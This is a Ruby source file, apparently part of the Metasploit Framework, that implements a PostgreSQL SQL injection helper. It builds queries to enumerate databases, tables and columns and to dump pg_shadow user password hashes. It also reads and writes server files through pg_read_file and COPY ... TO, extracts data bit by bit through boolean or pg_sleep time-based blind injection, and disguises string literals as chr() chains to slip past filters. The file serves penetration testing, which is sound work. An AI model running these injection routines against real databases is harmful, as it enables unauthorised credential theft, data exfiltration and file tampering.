require 'base64'

#
# This class represents a PostgreSQL injection object. Its primary purpose is to provide the common SQL queries
# needed when performing SQL injection.
# This class should not be instantiated directly, refer to Msf::Exploit::SQLi#create_sqli.
#
module Msf::Exploit::SQLi::PostgreSQLi
  class Common < Msf::Exploit::SQLi::Common
    #
    # Encoders supported by PostgreSQL.
    # Keys are encoder names. Each value holds an SQL template (:encode, where ^DATA^ is replaced with the
    # expression to encode on the server side) and a Ruby proc (:decode) that turns the encoded output back
    # into the raw value.
    #
    # The base64 template removes the newlines that encode(..., 'base64') inserts in long outputs. It uses
    # chr(10) instead of an E'\n' literal because hex_encode_strings rewrites quoted literals, which would
    # leave a dangling E prefix and produce invalid SQL.
    #
    ENCODERS = {
      base64: {
        encode: 'translate(encode(^DATA^::bytea, \'base64\'), chr(10),\'\')',
        decode: proc { |data| Base64.decode64(data) }
      },
      hex: {
        encode: 'encode(^DATA^::bytea, \'hex\')',
        decode: proc { |data| Rex::Text.hex_to_raw(data) }
      }
    }.freeze

    # Maps a mask of n consecutive low set bits to n. Not referenced in this class.
    # NOTE(review): presumably consumed by SQLi::Common for blind injections; verify before changing.
    BIT_COUNTS = { 0 => 0, 0b1 => 1, 0b11 => 2, 0b111 => 3, 0b1111 => 4, 0b11111 => 5, 0b111111 => 6, 0b1111111 => 7, 0b11111111 => 8 }.freeze

    #
    # See SQLi::Common#initialize
    # A String/Symbol :encoder naming one of ENCODERS is replaced by that encoder's Hash, and
    # :concat_separator defaults to ','.
    #
    def initialize(datastore, framework, user_output, opts = {}, &query_proc)
      # Work on a copy so the caller's hash is never mutated (it may be frozen or reused).
      # The bare `super` below passes the current value of `opts`, i.e. this copy.
      opts = opts.dup
      if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
        # If it's a String or a Symbol, use a predefined encoder if it exists.
        # Unknown names stay a Symbol (presumably rejected later by check_opts).
        opts[:encoder] = opts[:encoder].downcase.intern
        opts[:encoder] = ENCODERS[opts[:encoder]] if ENCODERS[opts[:encoder]]
      end
      opts[:concat_separator] ||= ','
      super
    end

    #
    # Query the PostgreSQL version
    # @return [String] The PostgreSQL version in use
    #
    def version
      call_function('version()')
    end

    #
    # Query the current database name
    # @return [String] The name of the current database
    #
    def current_database
      call_function('current_database()')
    end

    #
    # Query the current user (getpgusername() is PostgreSQL's legacy synonym for current_user)
    # @return [String] The username of the current user
    #
    def current_user
      call_function('getpgusername()')
    end

    #
    # Query the names of all the existing databases
    # @return [Array] An array of Strings, the database names
    #
    def enum_database_names
      dump_table_fields('pg_database', %w[datname]).flatten
    end

    #
    # Query the names of the tables in a given schema
    # @param database [String] the schema name (matched against information_schema.tables.table_schema),
    #   or a function call such as current_schema(); defaults to public
    # @return [Array] An array of Strings, the table names in the given schema
    #
    def enum_table_names(database = 'public')
      dump_table_fields('information_schema.tables', %w[table_name],
                        "table_schema=#{schema_expression(database)}").flatten
    end

    #
    # Query the names of the views in the given schema
    # @param database [String] the schema name (matched against information_schema.views.table_schema),
    #   or a function call; defaults to public
    # @return [Array] An array of Strings, the view names in the given schema
    #
    def enum_view_names(database = 'public')
      dump_table_fields('information_schema.views', %w[table_name],
                        "table_schema=#{schema_expression(database)}").flatten
    end

    #
    # Query the PostgreSQL users (their username and password); this might require elevated privileges.
    # @return [Array] an array of arrays representing rows, where each row contains two strings, the username and hashed password
    #
    def enum_dbms_users
      # pg_shadow is normally readable only by superusers
      dump_table_fields('pg_shadow', %w[usename passwd])
    end

    #
    # Query the column names of the given table
    # @param table_name [String] the table name, optionally qualified as "schema.table" (schema defaults to public)
    # @return [Array] An array of Strings, the column names of the given table
    #
    def enum_table_columns(table_name)
      if table_name.include?('.')
        database, table_name = table_name.split('.')
      else
        database = 'public' # or current_database() ?
      end
      dump_table_fields('information_schema.columns', %w[column_name],
                        "table_name='#{table_name}' and " \
                        "table_schema=#{schema_expression(database)}").flatten
    end

    #
    # Query the given columns of the records of the given table that satisfy an optional condition
    # @param table [String] The name of the table to query
    # @param columns [Array] The names of the columns to query
    # @param condition [String] An optional condition; return only the rows satisfying it
    # @param num_limit [Integer] An optional maximum number of results to return (0 means no limit)
    # @return [Array] An array where each element is an array of strings representing a row of the results;
    #   empty when no columns are requested
    #
    def dump_table_fields(table, columns, condition = '', num_limit = 0)
      return [] if columns.empty?

      columns = row_expression(columns)
      condition = condition.to_s
      condition = " where #{condition}" unless condition.empty?
      num_limit = num_limit.to_i
      limit = num_limit > 0 ? " limit #{num_limit}" : ''

      retrieved_data =
        if @safe
          # no string_agg: count the rows, then leak one row at a time
          row_count = run_sql("select count(1)::text from #{table}#{condition}").to_i
          num_limit = row_count if num_limit == 0 || row_count < num_limit
          num_limit.times.map do |current_row|
            if @truncation_length
              truncated_query("select substr(#{columns}::text,^OFFSET^,#{@truncation_length}) from " \
                              "#{table}#{condition} limit 1 offset #{current_row}")
            else
              run_sql("select #{columns}::text from #{table}#{condition} limit 1 offset #{current_row}")
            end
          end
        elsif num_limit > 0
          # the limit must apply before aggregation, so a subquery (with random aliases) is needed
          alias1, alias2 = 2.times.map { Rex::Text.rand_text_alpha(rand(2..9)) }
          if @truncation_length
            split_aggregate(truncated_query(
              "select substr(string_agg(#{alias1}, '#{@concat_separator}'),^OFFSET^,#{@truncation_length}) " \
              "from (select #{columns}::text #{alias1} from #{table}#{condition}#{limit}) #{alias2}"
            ))
          else
            split_aggregate(run_sql(
              "select string_agg(#{alias1}, '#{@concat_separator}') " \
              "from (select #{columns}::text #{alias1} from #{table}#{condition}#{limit}) #{alias2}"
            ))
          end
        elsif @truncation_length
          split_aggregate(truncated_query(
            "select substr(string_agg(#{columns}::text, '#{@concat_separator}'),^OFFSET^,#{@truncation_length}) " \
            "from #{table}#{condition}"
          ))
        else
          split_aggregate(run_sql("select string_agg(#{columns}::text, '#{@concat_separator}') from #{table}#{condition}"))
        end

      retrieved_data.map do |row|
        row = row.to_s
        # an empty row is one empty field; -1 keeps trailing empty fields (e.g. an empty last column)
        fields = row.empty? ? [row] : row.split(@second_concat_separator, -1)
        @encoder ? fields.map { |field| @encoder[:decode].call(field) } : fields
      end
    end

    #
    # Checks if the SQL injection is working, by checking that
    # queries that should return known results return the results we expect from them
    # @return [Boolean] Whether the check determined that the injection works
    #
    def test_vulnerable
      random_string_len = @truncation_length ? [rand(2..10), @truncation_length].min : rand(2..10)
      random_string = Rex::Text.rand_text_alphanumeric(random_string_len)
      output = run_sql("select #{encode_expression("'#{random_string}'")}")
      return false if output.nil?

      (@encoder ? @encoder[:decode].call(output) : output) == random_string
    end

    #
    # Writes data to a file on the target system using COPY ... TO
    # NOTE(review): single quotes in data/fname are not escaped, so callers must escape them
    # (double them) themselves; COPY's text format also escapes backslashes and newlines in the output.
    # @param fname [String] The full path to the file where data will be written
    # @param data [String] The data to write
    # @return [void]
    #
    def write_to_file(fname, data)
      raw_run_sql("copy (select '#{data}') to '#{fname}'")
    end

    #
    # Attempt reading from a file on the filesystem
    # NOTE(review): single quotes in fpath are not escaped.
    # @param fpath [String] The path of the file to read
    # @param binary [Boolean] Whether the target file should be considered a binary one (defaults to false)
    # @return [String] The content of the file if reading was successful
    #
    def read_from_file(fpath, binary=false)
      if binary
        # pg_read_binary_file returns bytea
        # an encoder might be needed
        call_function("pg_read_binary_file('#{fpath}')")
      else
        call_function("pg_read_file('#{fpath}')")
      end
    end

    private

    #
    # Helper method used in cases where the response is truncated: runs query repeatedly, advancing
    # ^OFFSET^ by @truncation_length, until a slice shorter than @truncation_length comes back.
    # @param query [String] The SQL query to execute, where ^OFFSET^ will be replaced with an integer offset for querying
    # @return [String] The query result
    #
    def truncated_query(query)
      result = []
      offset = 1
      loop do
        # a nil response (no output) is treated as an empty, final slice
        slice = run_sql(query.sub(/\^OFFSET\^/, offset.to_s)).to_s
        offset += @truncation_length
        result << slice
        vprint_status "{SQLi} Truncated output: #{slice} of size #{slice.size}"
        print_warning "The block returned a string larger than the truncation size : #{slice}" if slice.length > @truncation_length
        break if slice.length < @truncation_length
      end
      result.join
    end

    #
    # Checks the options specific to PostgreSQL
    # @raise [ArgumentError] if the encoder is neither nil, a Hash, nor the name of one of ENCODERS
    # @return [void]
    #
    def check_opts(opts)
      encoder = opts[:encoder]
      named_encoder = (encoder.is_a?(String) || encoder.is_a?(Symbol)) && ENCODERS[encoder.downcase.intern]
      unless encoder.nil? || encoder.is_a?(Hash) || named_encoder
        raise ArgumentError, 'Unsupported encoder'
      end

      super
    end

    #
    # Returns the output of a PostgreSQL function call
    # @param function [String] The function call, function_name(arguments...)
    # @return [String, nil] What the function call returns (nil if the query produced no output)
    #
    def call_function(function)
      function = encode_expression(function)
      output =
        if @truncation_length
          truncated_query("select substr(#{function},^OFFSET^,#{@truncation_length})")
        else
          run_sql("select #{function}")
        end
      # the decode procs cannot handle nil, so pass a missing output through unchanged
      @encoder && output ? @encoder[:decode].call(output) : output
    end

    #
    # Returns the length of the data that query should return, this is used in blind SQL injections.
    # The length is read one bit at a time, least significant first, until no higher bits remain.
    # @param query [String] The SQL query to execute
    # @param timebased [Boolean] true if it's a time-based query, false if it's boolean-based
    # @return [Integer] The length of the data that query should return
    #
    def blind_detect_length(query, timebased)
      prefix, suffix = blind_condition_wrappers(timebased)
      output_length = 0
      bit = 0
      loop do
        output_length |= (1 << bit) if blind_request("#{prefix}length((#{query})::bytea)&#{1 << bit}<>0#{suffix}")
        bit += 1
        break if blind_request("#{prefix}length((#{query})::bytea)/#{1 << bit}=0#{suffix}")
      end
      output_length
    end

    #
    # Retrieves the output of the given SQL query, this method is used in Blind SQL injections
    # @param query [String] The SQL query the user wants to execute
    # @param length [Integer] The expected length of the output of the result of the SQL query
    # @param known_bits [Integer] a bitmask all the bytes in the output are expected to match
    # @param bits_to_guess [Integer] the number of bits that must be retrieved from each byte of the query output
    # @param timebased [Boolean] true if it's a time-based query, false if it's boolean-based
    # @return [String] The query result
    #
    def blind_dump_data(query, length, known_bits, bits_to_guess, timebased)
      prefix, suffix = blind_condition_wrappers(timebased)
      length.times.map do |byte_index|
        byte = known_bits
        bits_to_guess.times do |bit|
          # the query result is cast to bytea; get_bit numbers bits from the least significant
          # bit of the first byte, so byte j, bit k is at position j * 8 + k
          byte |= (1 << bit) if blind_request("#{prefix}get_bit((#{query})::bytea, #{byte_index * 8 + bit})<>0#{suffix}")
        end
        byte.chr
      end.join
    end

    #
    # Encodes strings in the query string as sequences of chr() calls
    # @param query [String] an SQL query
    # @return [String] The input query, where string literals are replaced by chr() concatenations
    #
    def hex_encode_strings(query)
      # for more encoding capabilities, run code at the beginning of your block
      # known issue: escaped quotes, \' or '', are detected as being string terminators
      query.gsub(/'[^']*?'/) do |match|
        if match.length == 2
          # empty literal: a zero-length slice of a random character
          %w[left right].sample + "(chr(#{rand(1..255)}),0)"
        else
          # parenthesized so that a following operator (e.g. ::bytea) applies to the whole string
          # and not only to its last chr()
          '(' + match[1..-2].each_codepoint.map { |c| "chr(#{c})" }.join('||') + ')'
        end
      end
    end

    #
    # Wraps an SQL expression with the configured encoder's :encode template (unchanged if none).
    # The block form of sub is used so backslashes in the expression are not treated as
    # replacement-string escapes.
    # @param expression [String] the SQL expression to encode
    # @return [String] the (possibly) encoded SQL expression
    #
    def encode_expression(expression)
      return expression unless @encoder

      @encoder[:encode].sub(/\^DATA\^/) { expression }
    end

    #
    # Builds the SQL expression producing one text value per row for the given columns: NULLs are
    # replaced with @null_replacement, each column is encoded, and multiple columns are joined with
    # @second_concat_separator.
    # @param columns [Array] non-empty list of column names
    # @return [String] the SQL expression
    #
    def row_expression(columns)
      encoded = columns.map { |col| encode_expression("coalesce(#{col}::text,'#{@null_replacement}')") }
      return encoded.first if encoded.length == 1

      "concat_ws('#{@second_concat_separator}',#{encoded.join(',')})"
    end

    #
    # Splits a string_agg result into rows; -1 keeps trailing empty rows, and nil yields no rows.
    # @param output [String, nil] the aggregated query output
    # @return [Array] the individual rows
    #
    def split_aggregate(output)
      output.to_s.split(@concat_separator || ',', -1)
    end

    #
    # Returns a schema name as an SQL expression: values containing '(' are treated as function calls
    # and used verbatim; anything else is quoted as a string literal.
    # @param schema [String] a schema name or a function call
    # @return [String] the SQL expression
    #
    def schema_expression(schema)
      schema.include?('(') ? schema : "'#{schema}'"
    end

    #
    # Returns the [prefix, suffix] wrapped around a blind condition: both empty for boolean-based
    # injection; for time-based injection, a CASE expression that sleeps SqliDelay seconds when the
    # condition holds.
    # @param timebased [Boolean] whether the injection is time-based
    # @return [Array<String>] the prefix and suffix strings
    #
    def blind_condition_wrappers(timebased)
      return ['', ''] unless timebased

      ['1=(case when ', " then (select 1 from pg_sleep(#{datastore['SqliDelay']})) else 1 end)"]
    end
  end
end
